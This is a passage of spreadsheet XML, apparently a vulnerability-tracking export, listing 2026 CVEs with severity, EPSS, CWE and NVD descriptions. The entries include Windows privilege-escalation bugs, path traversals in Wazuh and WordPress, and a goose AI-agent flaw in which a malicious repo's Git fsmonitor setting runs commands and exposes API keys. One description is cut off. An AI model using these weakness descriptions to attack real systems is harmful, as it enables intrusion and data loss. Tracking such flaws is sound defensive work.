      <c r="M3488" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-71351</t>
        </is>
      </c>
    </row>
    <row r="3489">
      <c r="A3489" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B3489" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-71353</t>
        </is>
      </c>
      <c r="C3489" s="5" t="n">
        <v>7</v>
      </c>
      <c r="D3489" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E3489" s="5" t="inlineStr"/>
      <c r="F3489" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G3489" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H3489" s="5" t="inlineStr"/>
      <c r="I3489" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J3489" s="5" t="inlineStr"/>
      <c r="K3489" s="5" t="inlineStr">
        <is>
          <t>CWE-415</t>
        </is>
      </c>
      <c r="L3489" s="5" t="inlineStr">
        <is>
          <t>Double free in Windows Routing and Remote Access Service (RRAS) allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="M3489" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-71353</t>
        </is>
      </c>
    </row>
    <row r="3490">
      <c r="A3490" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B3490" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-72718</t>
        </is>
      </c>
      <c r="C3490" s="5" t="n">
        <v>7</v>
      </c>
      <c r="D3490" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E3490" s="5" t="inlineStr"/>
      <c r="F3490" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G3490" s="5" t="inlineStr"/>
      <c r="H3490" s="5" t="inlineStr"/>
      <c r="I3490" s="5" t="inlineStr">
        <is>
          <t>2026-08-10</t>
        </is>
      </c>
      <c r="J3490" s="5" t="inlineStr"/>
      <c r="K3490" s="5" t="inlineStr">
        <is>
          <t>CWE-94</t>
        </is>
      </c>
      <c r="L3490" s="5" t="inlineStr">
        <is>
          <t>goose is general-purpose AI agent that runs on your machine. Prior to 1.44.0, the `goose review` command runs the system `git` executable to gather the diff for review without stripping attacker-controlled Git configuration. A malicious repository whose `.git/config` sets [`core] fsmonitor = &lt;command&gt;` causes Git to execute that command on the host during the index refresh performed by `git diff HEAD`. The command runs before goose contacts a model and without a submitted prompt, model call, tool approval, or trust prompt. The context-gathering Git process is not sandboxed and is outside goose's tool-permission model. Arbitrary commands run with the privileges and environment of the user running goose, allowing file access or modification and exfiltration of environment secrets and provider API keys. The vulnerable Git invocations are built by git_command() in crates/goose-cli/src/commands/review/handler.rs and are used by touched_files() and collect_diff() for `git diff --name-only HEAD` and `git diff HEAD`. This issue is fixed in version 1.44.0.</t>
        </is>
      </c>
      <c r="M3490" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-72718</t>
        </is>
      </c>
    </row>
    <row r="3491">
      <c r="A3491" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B3491" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-72926</t>
        </is>
      </c>
      <c r="C3491" s="5" t="n">
        <v>7</v>
      </c>
      <c r="D3491" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E3491" s="5" t="inlineStr"/>
      <c r="F3491" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G3491" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H3491" s="5" t="inlineStr"/>
      <c r="I3491" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J3491" s="5" t="inlineStr"/>
      <c r="K3491" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="L3491" s="5" t="inlineStr">
        <is>
          <t>Use after free in Windows Internet Connection Sharing (ICS) allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="M3491" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-72926</t>
        </is>
      </c>
    </row>
    <row r="3492">
      <c r="A3492" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B3492" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-72930</t>
        </is>
      </c>
      <c r="C3492" s="5" t="n">
        <v>7</v>
      </c>
      <c r="D3492" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E3492" s="5" t="inlineStr"/>
      <c r="F3492" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G3492" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H3492" s="5" t="inlineStr"/>
      <c r="I3492" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J3492" s="5" t="inlineStr"/>
      <c r="K3492" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="L3492" s="5" t="inlineStr">
        <is>
          <t>Use after free in Windows Secure Socket Tunneling Protocol (SSTP) allows an authorized attacker to execute code locally.</t>
        </is>
      </c>
      <c r="M3492" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-72930</t>
        </is>
      </c>
    </row>
    <row r="3493">
      <c r="A3493" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B3493" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-72952</t>
        </is>
      </c>
      <c r="C3493" s="5" t="n">
        <v>7</v>
      </c>
      <c r="D3493" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E3493" s="5" t="inlineStr"/>
      <c r="F3493" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G3493" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H3493" s="5" t="inlineStr"/>
      <c r="I3493" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J3493" s="5" t="inlineStr"/>
      <c r="K3493" s="5" t="inlineStr">
        <is>
          <t>CWE-125</t>
        </is>
      </c>
      <c r="L3493" s="5" t="inlineStr">
        <is>
          <t>Out-of-bounds read in Windows Spaceport.sys allows an authorized attacker to execute code locally.</t>
        </is>
      </c>
      <c r="M3493" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-72952</t>
        </is>
      </c>
    </row>
    <row r="3494">
      <c r="A3494" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B3494" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-72963</t>
        </is>
      </c>
      <c r="C3494" s="5" t="n">
        <v>7</v>
      </c>
      <c r="D3494" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E3494" s="5" t="inlineStr"/>
      <c r="F3494" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G3494" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H3494" s="5" t="inlineStr"/>
      <c r="I3494" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J3494" s="5" t="inlineStr"/>
      <c r="K3494" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="L3494" s="5" t="inlineStr">
        <is>
          <t>Use after free in Windows Modern Execution Server allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="M3494" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-72963</t>
        </is>
      </c>
    </row>
    <row r="3495">
      <c r="A3495" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B3495" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-73003</t>
        </is>
      </c>
      <c r="C3495" s="5" t="n">
        <v>7</v>
      </c>
      <c r="D3495" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E3495" s="5" t="inlineStr"/>
      <c r="F3495" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G3495" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H3495" s="5" t="inlineStr"/>
      <c r="I3495" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J3495" s="5" t="inlineStr"/>
      <c r="K3495" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="L3495" s="5" t="inlineStr">
        <is>
          <t>Use after free in Windows Modern Device Management (MDM) allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="M3495" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-73003</t>
        </is>
      </c>
    </row>
    <row r="3496">
      <c r="A3496" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B3496" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-73005</t>
        </is>
      </c>
      <c r="C3496" s="5" t="n">
        <v>7</v>
      </c>
      <c r="D3496" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E3496" s="5" t="inlineStr"/>
      <c r="F3496" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G3496" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H3496" s="5" t="inlineStr"/>
      <c r="I3496" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J3496" s="5" t="inlineStr"/>
      <c r="K3496" s="5" t="inlineStr">
        <is>
          <t>CWE-362, CWE-416</t>
        </is>
      </c>
      <c r="L3496" s="5" t="inlineStr">
        <is>
          <t>Use after free in Windows Authentication Methods allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="M3496" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-73005</t>
        </is>
      </c>
    </row>
    <row r="3497">
      <c r="A3497" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B3497" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-73022</t>
        </is>
      </c>
      <c r="C3497" s="5" t="n">
        <v>7</v>
      </c>
      <c r="D3497" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E3497" s="5" t="inlineStr"/>
      <c r="F3497" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G3497" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H3497" s="5" t="inlineStr"/>
      <c r="I3497" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J3497" s="5" t="inlineStr"/>
      <c r="K3497" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="L3497" s="5" t="inlineStr">
        <is>
          <t>Use after free in Windows Modern Device Management (MDM) allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="M3497" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-73022</t>
        </is>
      </c>
    </row>
    <row r="3498">
      <c r="A3498" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B3498" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-73033</t>
        </is>
      </c>
      <c r="C3498" s="5" t="n">
        <v>7</v>
      </c>
      <c r="D3498" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E3498" s="5" t="inlineStr"/>
      <c r="F3498" s="5" t="n">
        <v>0.006</v>
      </c>
      <c r="G3498" s="5" t="inlineStr"/>
      <c r="H3498" s="5" t="inlineStr"/>
      <c r="I3498" s="5" t="inlineStr">
        <is>
          <t>2026-08-10</t>
        </is>
      </c>
      <c r="J3498" s="5" t="inlineStr"/>
      <c r="K3498" s="5" t="inlineStr">
        <is>
          <t>CWE-22</t>
        </is>
      </c>
      <c r="L3498" s="5" t="inlineStr">
        <is>
          <t>Sucuri Security WordPress plugin through version 2.7.3 contains a path traversal vulnerability in the pageIntegritySubmission() method in src/integrity.lib.php that allows authenticated administrators to delete arbitrary files by supplying directory traversal sequences in the sucuriscan_integrity parameter. Attackers can manipulate the unsanitized file path concatenated with ABSPATH to traverse outside the WordPress installation directory and invoke unlink() on sensitive files such as wp-config.php and .htaccess, causing site outage or enabling malicious reinstallation.</t>
        </is>
      </c>
      <c r="M3498" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-73033</t>
        </is>
      </c>
    </row>
    <row r="3499">
      <c r="A3499" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B3499" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-74038</t>
        </is>
      </c>
      <c r="C3499" s="5" t="n">
        <v>7</v>
      </c>
      <c r="D3499" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E3499" s="5" t="inlineStr"/>
      <c r="F3499" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G3499" s="5" t="inlineStr"/>
      <c r="H3499" s="5" t="inlineStr"/>
      <c r="I3499" s="5" t="inlineStr">
        <is>
          <t>2026-08-18</t>
        </is>
      </c>
      <c r="J3499" s="5" t="inlineStr"/>
      <c r="K3499" s="5" t="inlineStr">
        <is>
          <t>CWE-22</t>
        </is>
      </c>
      <c r="L3499" s="5" t="inlineStr">
        <is>
          <t>Wazuh 4.0.0 before 4.14.6 contains a path traversal vulnerability that allows unauthenticated remote attackers to cause denial of service by enrolling an agent with a dot-sequence name such as ".." through the enrollment port. Attackers exploit insufficient validation in OS_IsValidName() and unsafe path concatenation in delete_diff() to resolve the traversal to the parent queue directory, causing its subdirectories to be removed and stopping all Wazuh services requiring manual recovery.</t>
        </is>
      </c>
      <c r="M3499" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-74038</t>
        </is>
      </c>
    </row>
    <row r="3500">
      <c r="A3500" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B3500" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-74044</t>
        </is>
      </c>
      <c r="C3500" s="5" t="n">
        <v>7</v>
      </c>
      <c r="D3500" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E3500" s="5" t="inlineStr"/>
      <c r="F3500" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G3500" s="5" t="inlineStr"/>
      <c r="H3500" s="5" t="inlineStr"/>
      <c r="I3500" s="5" t="inlineStr">
        <is>
          <t>2026-08-18</t>
        </is>
      </c>
      <c r="J3500" s="5" t="inlineStr"/>
      <c r="K3500" s="5" t="inlineStr">
        <is>
          <t>CWE-22</t>
        </is>
      </c>
      <c r="L3500" s="5" t="inlineStr">
        <is>
          <t>Wazuh 4.0.0 before 4.14.6 contains a path traversal vulnerability that allows authenticated cluster peers to delete arbitrary directory contents by supplying a traversal-shaped node name in the cluster hello payload without validation. Attackers holding a valid cluster Fernet key can craft a malicious node name and disconnect, triggering the master's peer cleanup routine to remove the contents of arbitrary directories within the Wazuh installation path writable by the wazuh user.</t>
        </is>
      </c>
      <c r="M3500" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-74044</t>
        </is>
      </c>
    </row>
    <row r="3501">
      <c r="A3501" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B3501" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-74236</t>
        </is>
      </c>
      <c r="C3501" s="5" t="n">
        <v>7</v>
      </c>
      <c r="D3501" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E3501" s="5" t="inlineStr"/>
      <c r="F3501" s="5" t="n">
        <v>0.006</v>
      </c>
      <c r="G3501" s="5" t="inlineStr"/>
      <c r="H3501" s="5" t="inlineStr"/>
      <c r="I3501" s="5" t="inlineStr">
        <is>
          <t>2026-09-04</t>
        </is>
      </c>
      <c r="J3501" s="5" t="inlineStr"/>
      <c r="K3501" s="5" t="inlineStr">
        <is>
          <t>CWE-22</t>
        </is>
      </c>
      <c r="L3501" s="5" t="inlineStr">
        <is>
          <t>GFI Exinda AI and ClearView before 7.6.5 contains a path traversal vulnerability in the diagnostic file deletion handler. The unlink_or_email_file() function accepts parameters prefixed with v_file_row_ and appends their values directly to a base directory path without sanitizing for directory traversal sequences. An authenticated attacker with Admin privileges can delete arbitrary files from the system in the context of root.</t>
        </is>
      </c>
      <c r="M3501" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-74236</t>
        </is>
      </c>
    </row>
    <row r="3502">
      <c r="A3502" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B3502" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-74796</t>
        </is>
      </c>
      <c r="C3502" s="5" t="n">
        <v>7</v>
      </c>
      <c r="D3502" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E3502" s="5" t="inlineStr"/>
      <c r="F3502" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G3502" s="5" t="inlineStr"/>
      <c r="H3502" s="5" t="inlineStr"/>
      <c r="I3502" s="5" t="inlineStr">
        <is>
          <t>2026-08-16</t>
        </is>
      </c>
      <c r="J3502" s="5" t="inlineStr"/>
      <c r="K3502" s="5" t="inlineStr">
        <is>
          <t>CWE-59</t>
        </is>
      </c>
      <c r="L3502" s="5" t="inlineStr">
        <is>
          <t>OpenTofu before 1.11.7 fails to validate existing symlinks in the provider cache directory during initialization. Attackers can place a malicious symlink in a trusted working directory to cause tofu init to write provider package contents to arbitrary filesystem locations outside the working tree.</t>
        </is>
      </c>
      <c r="M3502" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-74796</t>
        </is>
      </c>
    </row>
    <row r="3503">
      <c r="A3503" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B3503" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-77485</t>
        </is>
      </c>
      <c r="C3503" s="5" t="n">
        <v>7</v>
      </c>
      <c r="D3503" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E3503" s="5" t="inlineStr"/>
      <c r="F3503" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G3503" s="5" t="inlineStr"/>
      <c r="H3503" s="5" t="inlineStr"/>
      <c r="I3503" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J3503" s="5" t="inlineStr"/>
      <c r="K3503" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="L3503" s="5" t="inlineStr">
        <is>
          <t>Use after free in SQL Server allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="M3503" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-77485</t>
        </is>
      </c>
    </row>
    <row r="3504">
      <c r="A3504" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B3504" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-77894</t>
        </is>
      </c>
      <c r="C3504" s="5" t="n">
        <v>7</v>
      </c>
      <c r="D3504" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E3504" s="5" t="inlineStr"/>
      <c r="F3504" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G3504" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H3504" s="5" t="inlineStr"/>
      <c r="I3504" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J3504" s="5" t="inlineStr"/>
      <c r="K3504" s="5" t="inlineStr">
        <is>
          <t>CWE-362, CWE-416</t>
        </is>
      </c>
      <c r="L3504" s="5" t="inlineStr">
        <is>
          <t>Concurrent execution using shared resource with improper synchronization ('race condition') in Windows Installer allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="M3504" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-77894</t>
        </is>
      </c>
    </row>
    <row r="3505">
      <c r="A3505" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B3505" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-77897</t>
        </is>
      </c>
      <c r="C3505" s="5" t="n">
        <v>7</v>
      </c>
      <c r="D3505" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E3505" s="5" t="inlineStr"/>
      <c r="F3505" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G3505" s="5" t="inlineStr"/>
      <c r="H3505" s="5" t="inlineStr"/>
      <c r="I3505" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J3505" s="5" t="inlineStr"/>
      <c r="K3505" s="5" t="inlineStr">
        <is>
          <t>CWE-23</t>
        </is>
      </c>
      <c r="L3505" s="5" t="inlineStr">
        <is>
          <t>Relative path traversal in Power Automate allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="M3505" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-77897</t>
        </is>
      </c>
    </row>
    <row r="3506">
      <c r="A3506" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B3506" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-77899</t>
        </is>
      </c>
      <c r="C3506" s="5" t="n">
        <v>7</v>
      </c>
      <c r="D3506" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E3506" s="5" t="inlineStr"/>
      <c r="F3506" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G3506" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H3506" s="5" t="inlineStr"/>
      <c r="I3506" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J3506" s="5" t="inlineStr"/>
      <c r="K3506" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="L3506" s="5" t="inlineStr">
        <is>
          <t>Use after free in Windows Security Center allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="M3506" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-77899</t>
        </is>
      </c>
    </row>
    <row r="3507">
      <c r="A3507" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B3507" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-77905</t>
        </is>
      </c>
      <c r="C3507" s="5" t="n">
        <v>7</v>
      </c>
      <c r="D3507" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E3507" s="5" t="inlineStr"/>
      <c r="F3507" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G3507" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H3507" s="5" t="inlineStr"/>
      <c r="I3507" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J3507" s="5" t="inlineStr"/>
      <c r="K3507" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="L3507" s="5" t="inlineStr">
        <is>
          <t>Use after free in Windows Management Instrumentation allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="M3507" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-77905</t>
        </is>
      </c>
    </row>
    <row r="3508">
      <c r="A3508" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B3508" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-78457</t>
        </is>
      </c>
      <c r="C3508" s="5" t="n">
        <v>7</v>
      </c>
      <c r="D3508" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E3508" s="5" t="inlineStr"/>
      <c r="F3508" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G3508" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H3508" s="5" t="inlineStr"/>
      <c r="I3508" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J3508" s="5" t="inlineStr"/>
      <c r="K3508" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="L3508" s="5" t="inlineStr">
        <is>
          <t>Use after free in Windows Security Health Service allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="M3508" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-78457</t>
        </is>
      </c>
    </row>
    <row r="3509">
      <c r="A3509" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B3509" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-78464</t>
        </is>
      </c>
      <c r="C3509" s="5" t="n">
        <v>7</v>
      </c>
      <c r="D3509" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E3509" s="5" t="inlineStr"/>
      <c r="F3509" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G3509" s="5" t="inlineStr">
        <is>
          <t>microsoft, windows</t>
        </is>
      </c>
      <c r="H3509" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_11_24h2, microsoft:windows_11_25h2, microsoft:windows_11_26h1</t>
        </is>
      </c>
      <c r="I3509" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J3509" s="5" t="inlineStr"/>
      <c r="K3509" s="5" t="inlineStr">
        <is>
          <t>CWE-367</t>
        </is>
      </c>
      <c r="L3509" s="5" t="inlineStr">
        <is>
          <t>Time-of-ch</t>
        </is>
      </c>
      <c r="M3509" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-78464</t>
        </is>
      </c>
    </row>
    <row r="3510">
      <c r="A3510" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B3510" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-79636</t>
        </is>
      </c>
      <c r="C3510" s="5" t="n">
        <v>7</v>
      </c>
      <c r="D3510" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E3510" s="5" t="inlineStr"/>
      <c r="F3510" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="G3510" s="5" t="inlineStr"/>
      <c r="H3510" s="5" t="inlineStr">
        <is>
          <t>dell:secure_connect_gateway</t>
        </is>
      </c>
      <c r="I3510" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="J3510" s="5" t="inlineStr"/>
      <c r="K3510" s="5" t="inlineStr">
        <is>
          <t>CWE-297</t>
        </is>
      </c>
      <c r="L3510"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unauthorized access.</t>
        </is>
      </c>
      <c r="M3510" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-79636</t>
        </is>
      </c>
    </row>
    <row r="3511">
      <c r="A3511" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B3511" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-80093</t>
        </is>
      </c>
      <c r="C3511" s="5" t="n">
        <v>7</v>
      </c>
      <c r="D3511" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E3511" s="5" t="inlineStr"/>
      <c r="F3511" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G3511" s="5" t="inlineStr">
        <is>
          <t>microsoft, windows</t>
        </is>
      </c>
      <c r="H351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3511" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J3511" s="5" t="inlineStr"/>
      <c r="K3511" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="L3511" s="5" t="inlineStr">
        <is>
          <t>Use after free in Windows Cloud Files Mini Filter Driver allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="M3511" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-80093</t>
        </is>
      </c>
    </row>
    <row r="3512">
      <c r="A3512" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B3512" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-81192</t>
        </is>
      </c>
      <c r="C3512" s="5" t="n">
        <v>7</v>
      </c>
      <c r="D3512" s="5" t="inlineStr">
        <is>
